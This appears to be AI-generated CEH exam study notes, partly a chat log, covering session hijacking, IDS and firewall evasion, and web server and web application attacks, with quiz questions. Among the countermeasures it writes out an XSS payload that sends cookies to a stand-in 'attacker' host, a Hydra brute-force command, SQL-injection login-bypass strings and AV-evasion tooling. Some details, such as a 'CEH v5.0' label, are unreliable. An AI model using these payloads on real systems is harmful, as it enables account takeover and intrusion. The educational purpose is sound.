    Exam Trap: SYN cookies is a defense against SYN flood: server does not allocate state until final ACK. Also, enable IP source guard to prevent spoofing.

    Countermeasure: (This topic is countermeasure) Implement a multi-layer defense: ISP level, perimeter firewall, application layer rate limiting, and scalable cloud resources.

    MCQ: Which technique can protect a server from SYN flood attacks without dropping legitimate connections?
    A) SYN cookies
    B) Disable TCP
    C) Block all ICMP
    D) Close port 80
    Correct: A – SYN cookies allow the server to handle legitimate connections while under attack. (B extreme; C not for TCP; D blocks service.)

Topic: DoS/DDoS Protection Tools

    Core Concept: Tools and services: Cloud-based scrubbing services (Cloudflare, Akamai, AWS Shield), on-premise appliances (F5, Arbor Networks), and network-level protections like blackhole routing.

    Key Tools: Cloudflare’s DDoS protection (reverse proxy). WAF with rate limiting. iptables with hashlimit. No single command; configuration.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Know the difference between on-premise and cloud-based protection. EC-Council might mention that a blackhole (sinkhole) drops all traffic to the target IP, including legitimate, but protects rest of network.

    Countermeasure: Use a hybrid approach: edge mitigation + application level controls.

    MCQ: An organization wants to defend against volumetric DDoS attacks without investing in hardware. Which solution is best?
    A) On-premise IPS
    B) Cloud-based DDoS scrubbing service
    C) Upgrade server CPU
    D) Install antivirus
    Correct: B – Cloud services can absorb large traffic volumes. (A cannot handle huge volumetric; C insufficient; D not for DDoS.)

Sub-Domain: Session Hijacking

Topic: Session Hijacking Concepts

    The 80/20 Summary: Session hijacking takes over an authenticated web session by stealing a valid session ID. Attackers can then impersonate the victim without credentials. Methods: session sniffing, XSS, predictable tokens, MITM.

    The Logical Breakdown: After the user logs in, the application assigns a session ID (cookie). Attacker obtains this ID through network sniffing (if HTTP), cross-site scripting, or brute-forcing. Attacker then uses the session ID in their own browser to access the application as the victim. Real-world: On unencrypted Wi-Fi, attacker uses Wireshark to capture cookie, then opens browser, edits cookie with that value, and gains access to victim’s email.

    The Technical Toolset: Wireshark: filter http.cookie. Burp Suite: Repeater to modify cookie. Ferret & Hamster (sidejacking). Bettercap: http.proxy to capture cookies. Cookie Editor browser extension.

    Exam Focus Areas (High Yield): Session ID should be unpredictable, long, and use HTTPS. EC-Council tests difference between session fixation (attacker forces known session ID onto victim) and session hijacking (stealing existing ID). Countermeasure: Use HTTPS, regenerate session ID after login, set Secure and HttpOnly flags.

    Knowledge Check: An attacker sets up a rogue access point, and a victim connects and logs into an HTTP site. The attacker captures the session cookie and uses it to access the site. What type of attack?
    A) Session fixation
    B) Session hijacking (sidejacking)
    C) SQL injection
    D) Cross-site request forgery
    Correct: B – Stealing and using a session cookie is session hijacking. (A is planting a predetermined ID; C/D different.)

Topic: Application-Level Session Hijacking

    The 80/20 Summary: Targets web application session tokens. Methods: predicting session ID (if weak), stealing via XSS, man-in-the-browser, session fixation, or exploiting insecure direct object references. The attacker acts at the HTTP layer.

    The Logical Breakdown: An attacker finds a reflected XSS vulnerability and sends a link to the victim. The script sends the victim’s cookie to the attacker. Alternatively, session fixation: attacker obtains a session ID, tricks victim into authenticating with that ID, then attacker uses it. Real-world: Attacker sends email with link to http://bank.com/login?sessionid=123 (fixation); victim logs in; attacker now uses session 123 and accesses account.

    The Technical Toolset: XSS: <script>new Image().src="http://attacker/cookie.php?c="+document.cookie</script>. Burp Suite: intercept and manipulate session cookies. WebGoat for practice.

    Exam Focus Areas (High Yield): Session fixation is prevented by changing session ID after login. HttpOnly cookie flag prevents JavaScript from reading the cookie. Secure flag ensures cookie sent only over HTTPS. Countermeasure: implement all cookie flags, use strong random session ID, re-authenticate for sensitive actions.

    Knowledge Check: A web application does not issue a new session ID after user authentication. An attacker logs in with a predetermined session ID and sends the same URL to a victim, who logs in. The attacker then uses that session ID. This is:
    A) Session sniffing
    B) Session fixation
    C) Session donation
    D) CSRF
    Correct: B – The attacker fixed the session ID beforehand. (A sniffing capture; C not a term; D CSRF performs actions not session takeover.)

Topic: Network-Level Session Hijacking

    The 80/20 Summary: Intercepting and injecting packets into an existing TCP session between two hosts. Attacker must be able to spoof IP and predict TCP sequence numbers. Tools use ARP spoofing to insert themselves.

    The Logical Breakdown: TCP session hijacking requires the attacker to inject malicious data into the stream, appearing to come from one side. Blind hijacking is when the attacker cannot see responses. Real-world: Using Hunt to hijack a telnet session: attacker sends RST to one side and takes over the connection using the correct sequence number.

    The Technical Toolset: Hunt (Linux, old), Juggernaut (old). Bettercap can perform TCP session injection. Hping3 to craft TCP packets with predicted sequence. Shijack tool.

    Exam Focus Areas (High Yield): Network-level hijacking is more difficult now due to random sequence numbers. EC-Council may ask about blind vs. non-blind hijacking. Countermeasure: Use encrypted protocols (SSH instead of Telnet), IPsec, and implement ingress filtering.

    Knowledge Check: An attacker uses a tool to inject a command into an existing Telnet session between a user and a server, without disrupting the connection. What technique is this?
    A) ARP poisoning
    B) TCP session hijacking
    C) DNS poisoning
    D) ICMP tunneling
    Correct: B – Injecting into a live TCP session is session hijacking. (A is prerequisite but not the technique itself; C/D unrelated.)

Topic: Session Hijacking Tools

    The 80/20 Summary: Application-level: Burp Suite, OWASP ZAP, Ferret/Hamster. Network-level: Hunt, Juggernaut, Bettercap. Also, browser-based extensions like Cookie Editor. Many MITM tools include session hijacking capabilities.

    The Logical Breakdown: Bettercap can sniff HTTP/HTTPS traffic via ARP spoofing and extract session cookies. Ferret captures cookies from sniffed traffic; Hamster acts as proxy to reuse them. Real-world: Using Bettercap’s http.proxy module to intercept and display cookies, then using browser to inject.

    The Technical Toolset: Bettercap: set http.proxy.sslstrip true, http.proxy on. Ferret: ferret -i eth0 (creates hamster.txt). Hamster: hamster then browser proxy to 127.0.0.1:3128. Burp Suite: Proxy tab intercept, then modify cookie in request.

    Exam Focus Areas (High Yield): Hamster & Ferret are specifically sidejacking tools. They capture and replay session cookies. EC-Council may ask for which tool does sidejacking. Countermeasure: Encrypt all traffic, enforce HSTS.

    Knowledge Check: A penetration tester uses a tool that captures HTTP cookies from a wireless network and then launches a browser-based proxy to reuse them. Which toolset?
    A) Nmap and Wireshark
    B) Ferret and Hamster
    C) Nessus and Nikto
    D) John and Hashcat
    Correct: B – Ferret captures, Hamster replays session cookies. (A sniff/capture not replay; C vulnerability scanners; D password cracking.)

Topic: Session Hijacking Countermeasures

    The 80/20 Summary: Use HTTPS for entire site, set cookies with Secure, HttpOnly, and SameSite attributes. Regenerate session ID after login and privilege changes. Implement logout function that invalidates session. Detect anomalies like IP change.

    The Logical Breakdown: Web servers should enforce TLS, use HSTS. Session management framework should generate strong random IDs. Application should check IP consistency and user-agent changes as indicators (though not absolute). Real-world: A site forces TLS, sets session cookie with secure and HttpOnly, and changes session ID upon login, making hijacking via network sniffing useless.

    The Technical Toolset: Web server config: Header always set Strict-Transport-Security "max-age=31536000". PHP: session_regenerate_id(true). .NET: SessionIDManager. Network: use VPN, SSH tunneling for sensitive connections.

    Exam Focus Areas (High Yield): The exam expects you to know that regenerating session ID after login is critical. Also, logging out should destroy the session on server. Countermeasure for network-level hijacking: encryption and authentication (IPsec).

    Knowledge Check: Which cookie attribute prevents client-side JavaScript from accessing the session token?
    A) Secure
    B) HttpOnly
    C) SameSite
    D) Domain
    Correct: B – HttpOnly restricts access from JavaScript, mitigating XSS-based cookie theft. (Secure restricts to HTTPS; SameSite restricts cross-origin; Domain sets scope.)

Sub-Domain: Evading IDS, Firewalls, and Honeypots

Topic: IDS, IPS, Firewall, and Honeypot Concepts

    Core Concept: IDS (Intrusion Detection System) detects intrusions, IPS (Intrusion Prevention System) blocks them. Firewall filters traffic by rules. Honeypots are decoy systems to lure attackers and study techniques. IDS/IPS use signature-based, anomaly-based, and policy-based detection.

    Key Tools: Snort (IDS/IPS): snort -i eth0 -c snort.conf. Suricata. Honeypot: Honeyd, KFSensor. Firewall: iptables, pfSense.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: IDS is passive (detect and alert), IPS is inline (can block). Signature detection catches known patterns, anomaly detection flags deviations from baseline. Honeypot is a trap; honeynet is a network of honeypots.

    Countermeasure: Use IDS/IPS in conjunction with firewall, keep signatures updated, tune to reduce false positives.

    MCQ: A security device monitors traffic and sends an alert when a packet matches a known attack pattern. This device is operating as:
    A) IPS
    B) IDS
    C) Firewall
    D) Router
    Correct: B – IDS alerts only; does not block. (A would block; C would filter based on rules; D routes.)

Topic: IDS, IPS, Firewall, and Honeypot Solutions

    Core Concept: Commercial and open-source solutions. Snort (open-source IDS/IPS), Cisco Firepower, Palo Alto (NGFW). Honeypots: Honeyd (virtual hosts), Kippo (SSH), Dionaea (malware capture). Tarpit slows attackers.

    Key Tools: Snort (rule-based): alert tcp any any -> any 80 (msg:"Attack"; content:"/etc/passwd";). pfSense: firewall distro. Honeyd: configuration file to mimic OS.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Snort can run in sniffer mode, packet logger, NIDS. Snort rules have action, protocol, source, destination. EC-Council may ask to identify a valid Snort rule syntax.

    Countermeasure: Deploy in-depth: use NGFW with integrated IPS, segment network, and use honeypots to divert attackers.

    MCQ: Which open-source tool can be configured as both an IDS and IPS by using inline mode?
    A) Snort
    B) Wireshark
    C) Nmap
    D) Metasploit
    Correct: A – Snort can be run inline (IPS) or passive (IDS). (B capture only; C scanner; D exploitation.)

Topic: Evading IDS

    Core Concept: Attackers bypass IDS by using encryption, fragmentation, evasion techniques (insertion, evasion), polymorphic shellcode, slow scanning, and exploiting IDS blind spots (false negatives).

    Key Tools: Fragroute (fragmentation). Nmap fragmentation -f. Metasploit payload encoding (msfvenom -e x86/shikata_ga_nai). Hping3 custom packets.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Insertion attack: sending packets that IDS accepts but target rejects, causing IDS to see different traffic. Evasion: sending packets IDS rejects but target accepts. Fragmentation overlaps can cause different reassembly. Countermeasure: Use stream reassembly in IDS, normalize traffic.

    Countermeasure: Update IDS signatures, use SSL inspection (but privacy concerns), and combine with anomaly detection.

    MCQ: An attacker fragments the TCP header across multiple packets so that the IDS fails to reassemble and detect the attack string, while the target reassembles correctly. This is:
    A) Insertion
    B) Evasion
    C) Session hijacking
    D) ARP spoofing
    Correct: B – Evasion when target accepts but IDS misses. (A is opposite; C/D different.)

Topic: Evading Firewalls

    Core Concept: Firewalls can be bypassed by using allowed protocols (HTTP tunneling, SSH tunneling), source port manipulation, IP spoofing (if ingress not filtered), fragmenting packets, and using proxies.

    Key Tools: Nmap source port: --source-port 53. HTTPTunnel: encapsulates TCP in HTTP requests. Tor and VPNs. Proxychains: proxychains nmap -sT target.

    Critical Port Numbers/Protocols: HTTP 80, DNS 53 commonly allowed.

    Exam Trap: Firewall evasion technique: firewall might allow DNS (53) out; attacker sets source port to 53 to bypass egress rules. Also, ICMP tunneling (ICMPTX) uses ICMP packets to carry data. Countermeasure: Deep packet inspection, egress filtering with stateful inspection.

    Countermeasure: Implement least privilege firewall rules, block all unnecessary ports outbound, use application-layer filtering.

    MCQ: A network allows outbound DNS queries only. An attacker wants to exfiltrate data. He could use:
    A) ARP poisoning
    B) DNS tunneling
    C) SQL injection
    D) SYN flood
    Correct: B – DNS tunneling hides data inside DNS queries, bypassing firewall rules. (A local; C web attack; D DoS.)

Topic: Evading NAC and Endpoint Security

    Core Concept: Network Access Control (NAC) enforces endpoint compliance (patches, AV) before granting access. Attackers evade by spoofing MAC/IP of an authorized device, using a mobile device not subject to NAC, or exploiting weak authentication.

    Key Tools: MAC spoofing, IP spoofing, packet crafting.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: NAC bypass techniques: using VoIP phone passthrough, hub to share port, MAC spoofing. Endpoint security evasion: disabling AV, using fileless malware, privilege escalation.

    Countermeasure: 802.1X with certificate-based authentication, continuous monitoring.

    MCQ: An attacker plugs a network hub between a trusted IP phone and the wall jack, then connects a laptop. The laptop is granted network access because it inherits the phone’s authorization. This bypass technique exploits:
    A) Weak MAC filtering
    B) VoIP phone passthrough/NAC bypass
    C) ARP poisoning
    D) DNS spoofing
    Correct: B – Some NAC implementations trust devices behind an IP phone; attacker piggybacks. (A MAC spoofing not mentioned; C/D unrelated.)

Topic: IDS/Firewall Evading Tools

    Core Concept: Tools to bypass detection: Nmap (fragmentation, decoy), Hping3 (custom packets), Metasploit payload encoders, veil-evasion, Shellter (code injection), and tunneling tools.

    Key Tools: Veil-Evasion: generates payloads that bypass AV. Shellter: dynamic shellcode injection. Nmap: --data-length, --mtu. Colusion (HTTP tunneling). ICMPTX (ICMP tunnel).

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Veil is specifically designed to bypass antivirus by creating obfuscated payloads. Shellter uses PE injection. Know the difference between encoders (Metasploit) and custom payload generators.

    Countermeasure: Use heuristic and behavioral AV, EDR, and restrict PowerShell and other tools.

    MCQ: A penetration tester needs to generate a Windows reverse shell executable that will not be detected by most antivirus. Which tool is purpose-built for this?
    A) Veil-Framework
    B) Wireshark
    C) Nessus
    D) Hydra
    Correct: A – Veil-Evasion is designed to create antivirus-evading payloads. (B sniffer; C vulnerability scanner; D password cracker.)

Topic: Detecting Honeypots

    Core Concept: Honeypots are traps; attackers detect them by analyzing responses for inconsistencies (e.g., no real traffic, too many open ports), using timing-based detection, or checking known honeypot signatures (e.g., MAC addresses of Honeyd).

    Key Tools: Manual probing, Nmap (-O for OS, -sV), Netcat, Send-Safe Honeypot Hunter.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Honeyd simulates multiple OSes; its default MAC 00:00:0C:XX:XX:XX can be a tell. Also, extremely high uptime or all ports open is suspicious. EC-Council may ask about detecting KFSensor by its service banners.

    Countermeasure: Honeypot operators randomize responses and mix with real systems; use high-interaction honeypots.

    MCQ: An attacker scans a system and finds ports 1-1000 all open with generic service banners and the MAC address starting with 00:00:0C. What is likely?
    A) A real server
    B) A honeypot, possibly Honeyd
    C) A firewall
    D) A router
    Correct: B – Honeyd default MAC and too many open ports are indicators. (A real server wouldn't have all ports open; C/D not.)

Topic: IDS/Firewall Evasion Countermeasures

    Core Concept: Defenses include stateful firewalls with deep packet inspection, IDS/IPS with updated signatures and anomaly detection, SSL inspection, ingress/egress filtering, NAC with 802.1X, and limiting unnecessary outbound protocols.

    Key Tools: Snort with proper rules, pfSense with Squid proxy, Cisco ASA.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The best defense against evasion is a layered approach: not relying on a single security device. Also, implement strict egress filtering to block tunnels.

    Countermeasure: (This is the countermeasure) Regular penetration testing to identify evasion paths.

    MCQ: Which configuration best prevents attackers from using DNS tunneling for exfiltration?
    A) Allow all outbound DNS
    B) Block TCP port 53
    C) Use a DNS security solution that analyzes query content and limits query size
    D) Disable ICMP
    Correct: C – Deep inspection of DNS traffic can detect anomalies and tunneling. (A allows it; B DNS uses UDP 53, TCP only for zone transfers; D unrelated.)

(Continue to Domain 5. I'll produce Domain 5, 6, 7, 8, 9 in the next response to avoid truncation. I'll stop here and indicate to continue from Domain 5.)

I will now provide the rest of the domains. Due to length, I'll halt here and instruct to continue from Domain 5.

Continuing from Domain 5.
This response is AI-generated, for reference only.
yes continue

We need to continue producing the filled study notes for the remaining domains: Domain 5 (Web Application Hacking), Domain 6 (Wireless Network Hacking), Domain 7 (Mobile Platform, IoT, and OT Hacking), Domain 8 (Cloud Computing), Domain 9 (Cryptography). The user asked to continue from where we left off, which was after Domain 4 Sub-Domain Evading IDS, Firewalls, and Honeypots. The assistant had just finished that sub-domain and indicated "Continue to Domain 5." So we'll start with Domain 5: Web Application Hacking, then proceed.

We need to follow the same exact formatting: domain heading, sub-domain heading, and for each topic, the appropriate tier template filled with actual content. For Deep Dive topics, we need all 5 sections; for Standard, the 6 sections; for Skim, 3 bullet points + MCQ. The output must be comprehensive but not exceed token limits. I'll craft all remaining content.

Let's structure:
Domain 5: Web Application Hacking (14%)
Sub-Domain: Hacking Web Servers

    Web Server Concepts (Standard)

    Web Server Attacks (Standard)

    Web Server Attack Methodology (Standard)

    Web Server Attack Countermeasures (Standard)

    Patch Management (Standard)

Sub-Domain: Hacking Web Applications

    Web App Concepts (Deep Dive)

    Web App Threats (Deep Dive)

    Web App Hacking Methodology (Deep Dive)

    Footprint Web Infrastructure (Deep Dive)

    Analyze Web Applications (Deep Dive)

    Bypass Client-Side Controls (Deep Dive)

    Attack Authentication Mechanism (Deep Dive)

    Attack Authorization Schemes (Deep Dive)

    Attack Access Controls (Deep Dive)

    Attack Session Management Mechanism (Deep Dive)

    Perform Injection/Input Validation Attacks (Deep Dive)

    Attack Application Logic Flaws (Deep Dive)

    Attack Shared Environments (Deep Dive)

    Attack Database Connectivity (Deep Dive)

    Attack Web App Client (Deep Dive)

    Attack Web Services (Deep Dive)

    Web API, Webhooks, and Web Shell (Deep Dive)

    Web App Security (Deep Dive)

Sub-Domain: SQL Injection

    SQL Injection Concepts (Deep Dive)

    Types of SQL Injection (Deep Dive)

    SQL Injection Methodology (Deep Dive)

    SQL Injection Tools (Deep Dive)

    Evasion Techniques (Deep Dive)

    SQL Injection Countermeasures (Deep Dive)

Then Domain 6 (Wireless), Domain 7 (Mobile/IoT/OT), Domain 8 (Cloud), Domain 9 (Crypto). I'll produce all this in one massive response. I'll make sure all numbered points are filled with specific CEH v5.0 relevant details.

I need to check the exact descriptions: In Domain 5, "Hacking Web Servers" sub-domain has 5 topics: Web Server Concepts, Web Server Attacks, Web Server Attack Methodology, Web Server Attack Countermeasures, Patch Management — all Standard. That's straightforward. I'll write Standard format for each.

For "Hacking Web Applications" sub-domain, many Deep Dive topics. I'll craft them systematically, ensuring realistic exam-focused content. For each, I'll provide the 80/20 summary, logical breakdown, toolset, exam traps, and a scenario MCQ.

For SQL Injection sub-domain, similarly Deep Dive.

Then Domain 6: Hacking Wireless Networks — all Skim topics. I'll provide 5 must-know facts, exam trap, and MCQ for each.

Domain 7: Hacking Mobile Platforms — Standard topics; IoT and OT Hacking — Skim topics.

Domain 8: Cloud Computing — Skim topics.

Domain 9: Cryptography — Standard topics.

I'll output everything from Domain 5 onward. I'll be mindful of token limits but I think it's feasible. I'll not include any meta-commentary, just the content.

Let's begin.
Domain 5: Web Application Hacking
Sub-Domain: Hacking Web Servers

Topic: Web Server Concepts

    Core Concept: A web server hosts websites, processing HTTP/HTTPS requests. Common servers: Apache, IIS, Nginx. Attackers target web server vulnerabilities (misconfigurations, default accounts) to gain access or deface.

    Key Tools: Nmap for service detection (nmap -sV -p 80,443 target). Netcat for banner grabbing (nc target 80 and HEAD / HTTP/1.0). WhatWeb (whatweb target).

    Critical Port Numbers/Protocols: HTTP 80, HTTPS 443.

    Exam Trap: IIS runs on Windows and uses ISAPI extensions; Apache runs on Linux/Unix. The default IIS directory is C:\Inetpub\wwwroot, Apache is /var/www/html. EC-Council may ask about web server architecture (multi-threaded, etc.).

    Countermeasure: Patch server software, remove default files, disable directory listing, and run with least privilege.

    MCQ: An organization's public-facing web server shows "Apache/2.4.7 (Ubuntu)" in the HTTP response header. What can an attacker infer?
    A) The server is running on Windows
    B) The server OS and web server version
    C) The server is vulnerable to SQL injection
    D) The server uses IIS
    Correct: B – The banner reveals software and OS. (A wrong; C not indicated; D not IIS.)

Topic: Web Server Attacks

    Core Concept: Attacks include directory traversal, defacement, DoS, buffer overflow, and exploiting misconfigured authentication. Attackers aim to compromise the server or its hosted applications.

    Key Tools: DirBuster (java -jar DirBuster.jar). Metasploit web server exploits (use exploit/windows/iis/ms03_007_ntdll_webdav). Nikto (nikto -h target).

    Critical Port Numbers/Protocols: HTTP 80, HTTPS 443.

    Exam Trap: Directory traversal (../ sequences) attempts to access files outside the web root. IIS Unicode vulnerability used %c0%af to bypass filters. Countermeasure: input validation and ACLs.

    Countermeasure: Secure configuration, disable unnecessary HTTP methods, apply patches, and use WAF.

    MCQ: An attacker sends a request GET /../../../../etc/passwd HTTP/1.1 to a web server. What attack is being attempted?
    A) SQL injection
    B) Directory traversal
    C) XSS
    D) CSRF
    Correct: B – Dot-dot-slash attempts to access files outside web root. (A injects SQL; C injects scripts; D cross-site request forgery.)

Topic: Web Server Attack Methodology

    Core Concept: The methodology includes information gathering, footprinting the web server, scanning for vulnerabilities, exploiting vulnerabilities, and maintaining access. It mirrors the general hacking phases but focused on the server.

    Key Tools: Recon: Netcraft, Shodan. Scanning: Nikto, Nmap. Exploit: Metasploit. Post-exploit: netcat backdoors.

    Critical Port Numbers/Protocols: 80, 443, 8080 (common alternative).

    Exam Trap: EC-Council’s methodology steps for web server attack: (1) Information gathering, (2) Web server footprinting, (3) Website mirroring, (4) Vulnerability scanning, (5) Session hijacking, (6) Web server password cracking. The order is testable.

    Countermeasure: Regular vulnerability scans, log monitoring, and using hardened templates.

    MCQ: After mirroring a target website using HTTrack, an attacker scans the local copy for comments and hidden paths. Which phase is this?
    A) Vulnerability scanning
    B) Web server footprinting
    C) Information gathering
    D) Session hijacking
    Correct: B – Footprinting includes analyzing mirrored content for clues. (A scanning follows; C initial recon; D later.)

Topic: Web Server Attack Countermeasures

    Core Concept: Harden the web server by removing unnecessary services, applying patches, using secure protocols, setting proper permissions, and deploying a web application firewall (WAF).

    Key Tools: Microsoft Baseline Security Analyzer (MBSA), IIS Lockdown Tool. Apache: mod_security (WAF). Nmap to audit.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: EC-Council stresses that changing default banners (obscurity) is not sufficient but can slow automated attacks. Also, disabling WebDAV if not needed.

    Countermeasure: (This topic is the countermeasure) Implement secure configuration standards, change default credentials, restrict access via IP, use WAF, monitor logs.

    MCQ: Which measure best protects a web server from known attack signatures?
    A) Disable ICMP
    B) Change the server banner
    C) Deploy a Web Application Firewall with updated rules
    D) Use HTTPS
    Correct: C – A WAF can filter malicious payloads based on signatures. (A is not web-specific; B obscurity; D encrypts but doesn't block attacks.)

Topic: Patch Management

    Core Concept: Regularly updating web server software, OS, and applications to fix known vulnerabilities. Attackers exploit unpatched servers (e.g., outdated Apache Struts). Patch management includes testing and deployment.

    Key Tools: WSUS (Windows), unattended-upgrades (Linux). Nessus can detect missing patches. SCCM.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The exam distinguishes between hotfix (single fix) and service pack (cumulative). Also, proper patch management requires testing in a non-production environment first to avoid breaking applications.

    Countermeasure: Implement a formal patch management policy, automate where possible, and monitor for new vulnerability disclosures (CVE).

    MCQ: A security team discovers a critical vulnerability in Apache. What should they do before applying the patch to the production server?
    A) Immediately apply it
    B) Test the patch in a staging environment
    C) Ignore until next monthly cycle
    D) Shut down the server
    Correct: B – Testing ensures the patch won't disrupt the application. (A could cause downtime; C leaves vulnerable; D extreme.)

Sub-Domain: Hacking Web Applications

Topic: Web App Concepts

    The 80/20 Summary: Web applications run on the server-side, processed via HTTP. They consist of client-side code (HTML/JS), server-side logic (PHP, ASP.NET, Java), and databases. Attackers target the application layer because it often has weak security controls.

    The Logical Breakdown: A web app accepts user input, processes it, and returns output. Attackers probe for injection points, authentication flaws, and logic errors. Real-world: A login form takes username and password; if the app does not properly validate input, an attacker can inject SQL to bypass authentication.

    The Technical Toolset: Proxy: Burp Suite, OWASP ZAP. Browser dev tools. Wappalyzer (identify tech stack). Web vulnerability scanners: Acunetix, Netsparker.

    Exam Focus Areas (High Yield): Web 2.0 uses AJAX, JSON, APIs. Countermeasure: Secure coding (input validation, output encoding), regular testing. EC-Council may ask about the difference between static and dynamic web pages.

    Knowledge Check: An application processes user-supplied search queries and reflects results without sanitization. What is the potential security risk?
    A) SQL injection
    B) Reflected XSS
    C) Buffer overflow
    D) Directory traversal
    Correct: B – Reflected input directly in page allows XSS. (A would need SQL query; C memory; D file access.)

Topic: Web App Threats

    The 80/20 Summary: OWASP Top 10 list major web app risks: injection, broken authentication, sensitive data exposure, XXE, broken access control, security misconfiguration, XSS, insecure deserialization, using components with known vulnerabilities, insufficient logging.

    The Logical Breakdown: Attackers exploit these threats to steal data, hijack sessions, deface, or gain server access. Real-world: An attacker finds an IDOR (insecure direct object reference) where changing a numeric ID in URL reveals another user's data.

    The Technical Toolset: Burp Suite to manipulate parameters. SQLMap for injection. XSSer for XSS. OWASP ZAP for automated scanning.

    Exam Focus Areas (High Yield): EC-Council heavily tests OWASP Top 10. Countermeasure: use secure development lifecycle, code review, penetration testing.

    Knowledge Check: A web app accepts XML input and processes external entities, allowing an attacker to read local files. This vulnerability is:
    A) SQL Injection
    B) XML External Entity (XXE)
    C) CSRF
    D) File upload
    Correct: B – XXE processes external entity references. (A SQL; C force actions; D uploads files.)

Topic: Web App Hacking Methodology

    The 80/20 Summary: Methodology: (1) Footprint web infrastructure, (2) Analyze web applications, (3) Bypass client-side controls, (4) Attack authentication, (5) Attack authorization, (6) Attack session management, (7) Perform injection attacks, (8) Attack application logic, (9) Attack shared environments, (10) Attack database connectivity, (11) Attack web services, (12) Attack web app client.

    The Logical Breakdown: This is the CEH-specific structured approach. It starts with passive recon, then active probing, then exploiting various layers. Real-world: A tester follows these steps: identifies server, maps app, tests input fields, finds SQLi, extracts data.

    The Technical Toolset: Each phase uses tools: Nmap, WhatWeb (footprint); Burp Spider (analysis); Burp Repeater (bypass controls); Hydra (authentication); etc.

    Exam Focus Areas (High Yield): The exact order and phase names may appear on the exam. Countermeasure for each phase must be understood.

    Knowledge Check: According to CEH, which step comes immediately after analyzing the web application's structure?
    A) Attack authentication
    B) Bypass client-side controls
    C) Perform SQL injection
    D) Attack session management
    Correct: B – The sequence is: footprint, analyze, bypass client-side, then attack authentication. (A after bypass; C later; D after auth.)

Topic: Footprint Web Infrastructure

    The 80/20 Summary: Discover servers, load balancers, web server software, technology stack, and hidden content. Includes domain lookups, WHOIS, DNS enumeration, and identifying other apps on the same server.

    The Logical Breakdown: Attackers use tools to gather IPs, subdomains, server types, and associated services. They might find development servers, admin panels. Real-world: Using dnsrecon to find all subdomains, discovering dev.target.com with no authentication.

    The Technical Toolset: dnsrecon, Sublist3r (subdomains), theHarvester, Shodan, Nmap (--script http-enum). WhatWeb for stack.

    Exam Focus Areas (High Yield): Discovering virtual hosts via DNS. Also, using SHODAN to find web servers by banner. Countermeasure: minimize information leakage, use fake banners.

    Knowledge Check: A pen tester uses dnsrecon -d target.com -t axfr and gets a list of all subdomains. This succeeded because:
    A) The DNS server allowed zone transfer
    B) The web server had directory listing
    C) SNMP was open
    D) SMTP VRFY was enabled
    Correct: A – Zone transfer (AXFR) provides full DNS records. (B for files; C for devices; D for users.)

Topic: Analyze Web Applications

    The 80/20 Summary: Examine the application’s structure, parameters, hidden fields, cookies, and API endpoints. Identify data entry points and logic. This phase maps the attack surface.

    The Logical Breakdown: Using a spidering tool to crawl the site, reviewing HTML/JS source, and intercepting traffic with a proxy to view all requests. Real-world: Attacker uses Burp Suite to spider the app, finds a hidden admin.php endpoint, and notes the parameter user_id.

    The Technical Toolset: Burp Suite Spider, OWASP ZAP Spider. Dirbuster/gobuster for brute-forcing directories. Developer tools (F12). Wfuzz for parameter fuzzing.

    Exam Focus Areas (High Yield): Spidering vs. directory brute-forcing. Robots.txt may list disallowed directories. Countermeasure: Do not rely on obscurity, properly authenticate all admin areas.

    Knowledge Check: An attacker finds that changing the hidden field price=100 to price=1 allows purchasing an item for $1. What web app flaw is this?
    A) SQL injection
    B) Parameter tampering
    C) XSS
    D) CSRF
    Correct: B – Altering a parameter (hidden field) that the server trusts is parameter tampering. (A injects SQL; C scripts; D forces action.)

Topic: Bypass Client-Side Controls

    The 80/20 Summary: Client-side controls (JavaScript validation, disabled submit buttons, input length limits) can be easily bypassed by disabling JavaScript, using proxy to modify requests, or sending direct HTTP requests. Never trust client-side security.

    The Logical Breakdown: Attackers intercept the request after the browser, modify the data (e.g., changing a maxlength value or bypassing a required field), and forward it to the server. Real-world: A login form has JavaScript to enforce alphanumeric password; attacker turns off JS, sends SQL injection payload, bypasses authentication.

    The Technical Toolset: Burp Suite Proxy (Intercept and modify). Browser dev tools (remove JS, alter values). curl or Python requests to send raw HTTP.

    Exam Focus Areas (High Yield): Any client-side validation can be bypassed; server-side validation is mandatory. Countermeasure: Implement all security checks on the server side, validate input there.

    Knowledge Check: A web app uses JavaScript to validate that an email field contains '@'. How can an attacker bypass this?
    A) XSS
    B) SQL injection
    C) Disable JavaScript and send the request with a proxy
    D) CSRF
    Correct: C – Removing client-side checks allows sending malicious input directly to the server. (A/B different attacks; D unrelated.)

Topic: Attack Authentication Mechanism

    The 80/20 Summary: Attacks include brute-force, credential stuffing, bypassing authentication via SQL injection, exploiting "Remember Me" features, and abusing weak password reset functionality. Attackers seek unauthorized access to user accounts.

    The Logical Breakdown: A login form may be vulnerable to automated password guessing if no lockout. An SQL injection like admin' OR '1'='1 can bypass login entirely. Real-world: Using Hydra to brute-force a login page, or using Burp Intruder for credential spraying.

    The Technical Toolset: Hydra: hydra -L users.txt -P pass.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect". Burp Intruder (pitchfork attack). SQLi login bypass: admin'--.

    Exam Focus Areas (High Yield): EC-Council tests default credentials for various devices. Also, password reset weakness (security questions). Countermeasure: Multi-factor authentication, account lockout, CAPTCHA, and secure password recovery.

    Knowledge Check: An attacker uses the username admin'-- and a blank password on a login form, gaining access. Which attack?
    A) Brute force
    B) SQL injection authentication bypass
    C) XSS
    D) Session hijacking
    Correct: B – The input comments out the rest of the SQL query, bypassing password check. (A brute-force tries many passwords; C injects script; D steals session.)

Topic: Attack Authorization Schemes

    The 80/20 Summary: Authorization controls what an authenticated user can do. Flaws include Insecure Direct Object References (IDOR), missing function-level access control, and privilege escalation. Attackers access other users' data or admin functions.

    The Logical Breakdown: A logged-in user can change a URL parameter like ?id=100 to ?id=101 and view another user's data because the server doesn't check ownership. Or a user accesses admin/panel directly without role check. Real-world: An attacker modifies the account ID in the profile URL to view other users' PII.

    The Technical Toolset: Burp Suite Repeater (manipulate parameters). Dirbuster to find hidden admin paths. Authorization testing: try low-privilege requests.

